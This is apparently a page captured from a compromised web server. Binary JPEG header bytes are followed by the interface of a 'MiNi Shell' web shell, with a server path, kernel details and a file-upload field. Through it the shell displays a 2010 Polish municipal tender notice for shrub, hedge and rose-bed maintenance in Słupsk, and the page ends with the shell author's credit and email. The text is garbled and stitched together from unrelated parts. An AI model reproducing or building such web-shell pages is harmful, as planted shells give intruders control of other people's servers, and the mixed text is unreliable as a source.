JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100308/63278-N-2010.html

<p class="kh_header"><b>Słupsk: Prace pielęgnacyjne w skupinach krzewów , żywopłotach i różankach na terenach zieleni miejskiej w Słupsku zgodnie z wykazami terenów  stanowiącymi załączniki nr 1 i 2 do SIWZ.</b><br>
<b>Numer ogłoszenia: 63278 - 2010; data zamieszczenia: 08.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku , ul. Kaszubska 4, 76-200 Słupsk, woj. pomorskie, tel. 059 8413722, 059 8481451, faks 059 8413723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztzmick.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace pielęgnacyjne w skupinach krzewów , żywopłotach i różankach na terenach zieleni miejskiej w Słupsku zgodnie z wykazami terenów  stanowiącymi załączniki nr 1 i 2 do SIWZ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wytyczne dotyczące wykonania przedmiotu zamówienia:
1) przycięcie krzewów -  praca winna być wykonana jeden raz wiosną do 31.03.2011r, która
  polega na: przycięciu sekatorem lub piłką krzewów zgodnie z zasadami sztuki ogrodniczej ,
  wycięciu zbędnych pędów i odrostów korzeniowych , zebraniu gałęzi i wywiezieniu ich na
   miejsce utylizacji,
2) przekopanie i pielenie skupin krzewów:
    a) przekopanie skupin wraz z zaznaczeniem obrysu skupiny, termin wykonania: do 8 maja
        2011r. , 
    b) odchwaszczanie skupin - 6 x w ciągu sezonu wegetacyjnego , pielenie ręczne wraz z
         zebraniem chwastów i wywiezieniem w miejsce utylizacji.
 3) opis prac wymaganych od Wykonawcy w zakresie pielęgnacji żywopłotów:
 a) przycięcie żywopłotów - 2 x w ciągu sezonu wegetacyjnego pilarką spalinową , zebranie
     gałązek i wywiezienie w miejsce utylizacji w terminach uzgodnionych z inspektorem
      nadzoru,
     b) odchwaszczanie żywopłotów : 6 x w sezonie wegetacyjnym., spulchnianie i pielenie z
          zaznaczeniem obrysu żywopłotu, zebranie chwastów i wywiezienie w miejsce utylizacji,
4) opis prac wymaganych od Wykonawcy w zakresie pielęgnacji różanek:
     a) wiosenne odkrycie róż / dot. 2011r./,
     b) przycięcie krzewów róż -1 x jesień i 1 x wiosna / dot. 2011r./; zebranie pędów i
         wywiezienie w miejsce utylizacji,
     c) obcięcie kwiatostanów róż - 2 x w sezonie; usunięcie sekatorem przekwitłych
         kwiatostanów i zbędnych gałązek; zebranie i wywiezienie w miejsce utylizacji,
     d) odchwaszczanie krzewów róż - 6 x w ciągu sezonu wegetacyjnego z wywiezieniem
         chwastów w miejsce utylizacji,
     e) zabezpieczenie róż na zimę - kopczykowanie róż poprzez zgarnięcie warstwy 
          gleby i utworzenie warstwy przykrycia w stanie rozluźnionym 20 cm, termin    
         agrotechniczny - po wystąpieniu pierwszych silniejszych przymrozków.Wiosną 
         należy  rozkopczykować róże / .wiosna do 31.03.2011r./..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówienia uzupełniającego , o którym mowa w art. 67 ust. 6 i 7 ustawy  dotychczasowemu Wykonawcy , stanowiącego nie więcej niż 30% wartości zamówienia  
 podstawowego na każdym zadaniu.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przed złożeniem oferty Wykonawcy powinni wnieść wadium   w kwocie:  zadanie nr 1 -  240,00 zł, zadanie nr 2 -  170,00 zł  w terminie do 15 marca 2010r. do godz. 10.00 .	
2. Wadium powinno być wniesione w formie określonej z art. 45 ust. 6 ustawy - Prawo zamówień publicznych.
3. Jeżeli wadium będzie wniesione w pieniądzu, powinno być wpłacone  na rachunek bankowy ZTZMiCK w Słupsku Nr 80124037701111000040698322 .</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymagane.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Warunek będzie spełniony jeżeli Wykonawcy wykonali w okresie trzech ostatnich lat licząc od daty wszczęcia niniejszego postępowania co najmniej trzy  usługi:
a)z których każda odpowiada swoim rodzajem przedmiotowi zamówienia tj. wykonaniu prac pielęgnacyjnych w skupinach krzewów , żywopłotach i różankach, oraz
b)których łączna  wartość brutto jest  nie mniejsza niż 45.000,00 zł brutto dla zadania nr 1 i nie mniejsza niż 45.000,00 zł brutto dla zadania nr 2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymagane.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie nadzoru - 1 osobą z wykształceniem wyższym ogrodniczym 
      lub z kwalifikacjami gospodarza terenów zieleni - ukończonym kursem na 
      poziomie II stopnia NOT i minimum 3 letnim stażem oraz minimum 2  
      ogrodnikami z wykształceniem technicznym lub zawodowym lub   
      przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia 
      potencjału technicznego i osób zdolnych do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 100 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Parafowany i wypełniony wzór umowy, dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający   dopuszcza możliwości zmiany postanowień zawartej umowy w stosunku
    do  treści oferty na podstawie której dokonano wyboru Wykonawcy w zakresie terminów i 
    liczby wykonania poszczególnych  prac.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztzmick.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku
ul.Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2010 godzina 10:00, miejsce: Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku
ul.Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na  pracach pielęgnacyjnych w skupinach krzewów , żywopłotach i różankach na terenach zieleni miejskiej w Słupsku zgodnie z wykazami terenów  stanowiącym załącznik nr 1  do SIWZ. 
3. Wytyczne dotyczące wykonania przedmiotu zamówienia:
1) przycięcie krzewów -  praca winna być wykonana jeden raz wiosną do 31.03.2011r, która
  polega na: przycięciu sekatorem lub piłką krzewów zgodnie z zasadami sztuki ogrodniczej ,
  wycięciu zbędnych pędów i odrostów korzeniowych , zebraniu gałęzi i wywiezieniu ich na
   miejsce utylizacji,
2) przekopanie i pielenie skupin krzewów:
    a) przekopanie skupin wraz z zaznaczeniem obrysu skupiny, termin wykonania: do 8 maja
        2011r. , 
    b) odchwaszczanie skupin - 6 x w ciągu sezonu wegetacyjnego , pielenie ręczne wraz z
         zebraniem chwastów i wywiezieniem w miejsce utylizacji.
 3) opis prac wymaganych od Wykonawcy w zakresie pielęgnacji żywopłotów:
 a) przycięcie żywopłotów - 2 x w ciągu sezonu wegetacyjnego pilarką spalinową , zebranie
     gałązek i wywiezienie w miejsce utylizacji w terminach uzgodnionych z inspektorem
      nadzoru,
     b) odchwaszczanie żywopłotów : 6 x w sezonie wegetacyjnym., spulchnianie i pielenie z
          zaznaczeniem obrysu żywopłotu, zebranie chwastów i wywiezienie w miejsce utylizacji,
4) opis prac wymaganych od Wykonawcy w zakresie pielęgnacji różanek:
     a) wiosenne odkrycie róż / dot. 2011r./,
     b) przycięcie krzewów róż -1 x jesień i 1 x wiosna / dot. 2011r./; zebranie pędów i
         wywiezienie w miejsce utylizacji,
     c) obcięcie kwiatostanów róż - 2 x w sezonie; usunięcie sekatorem przekwitłych
         kwiatostanów i zbędnych gałązek; zebranie i wywiezienie w miejsce utylizacji,
     d) odchwaszczanie krzewów róż - 6 x w ciągu sezonu wegetacyjnego z wywiezieniem
         chwastów w miejsce utylizacji,
     e) zabezpieczenie róż na zimę - kopczykowanie róż poprzez zgarnięcie warstwy 
          gleby i utworzenie warstwy przykrycia w stanie rozluźnionym 20 cm, termin    
         agrotechniczny - po wystąpieniu pierwszych silniejszych przymrozków Wiosną 
         należy  rozkopczykować róże / .wiosna do 31.03.2011r./..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na  pracach pielęgnacyjnych w skupinach krzewów , żywopłotach i różankach na terenach zieleni miejskiej w Słupsku zgodnie z wykazami terenów  stanowiącym załącznik nr  2 do SIWZ. 
3. Wytyczne dotyczące wykonania przedmiotu zamówienia:
1) przycięcie krzewów -  praca winna być wykonana jeden raz wiosną do 31.03.2011r, która
  polega na: przycięciu sekatorem lub piłką krzewów zgodnie z zasadami sztuki ogrodniczej ,
  wycięciu zbędnych pędów i odrostów korzeniowych , zebraniu gałęzi i wywiezieniu ich na
   miejsce utylizacji,
2) przekopanie i pielenie skupin krzewów:
    a) przekopanie skupin wraz z zaznaczeniem obrysu skupiny, termin wykonania: do 8 maja
        2011r. , 
    b) odchwaszczanie skupin - 6 x w ciągu sezonu wegetacyjnego , pielenie ręczne wraz z
         zebraniem chwastów i wywiezieniem w miejsce utylizacji.
 3) opis prac wymaganych od Wykonawcy w zakresie pielęgnacji żywopłotów:
 a) przycięcie żywopłotów - 2 x w ciągu sezonu wegetacyjnego pilarką spalinową , zebranie
     gałązek i wywiezienie w miejsce utylizacji w terminach uzgodnionych z inspektorem
      nadzoru,
     b) odchwaszczanie żywopłotów : 6 x w sezonie wegetacyjnym., spulchnianie i pielenie z
          zaznaczeniem obrysu żywopłotu, zebranie chwastów i wywiezienie w miejsce utylizacji,
4) opis prac wymaganych od Wykonawcy w zakresie pielęgnacji różanek:
     a) wiosenne odkrycie róż / dot. 2011r./,
     b) przycięcie krzewów róż -1 x jesień i 1 x wiosna / dot. 2011r./; zebranie pędów i
         wywiezienie w miejsce utylizacji,
     c) obcięcie kwiatostanów róż - 2 x w sezonie; usunięcie sekatorem przekwitłych
         kwiatostanów i zbędnych gałązek; zebranie i wywiezienie w miejsce utylizacji,
     d) odchwaszczanie krzewów róż - 6 x w ciągu sezonu wegetacyjnego z wywiezieniem
         chwastów w miejsce utylizacji,
     e) zabezpieczenie róż na zimę - kopczykowanie róż poprzez zgarnięcie warstwy 
          gleby i utworzenie warstwy przykrycia w stanie rozluźnionym 20 cm, termin    
         agrotechniczny - po wystąpieniu pierwszych silniejszych przymrozków Wiosną 
         należy  rozkopczykować róże / .wiosna do 31.03.2011r./..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com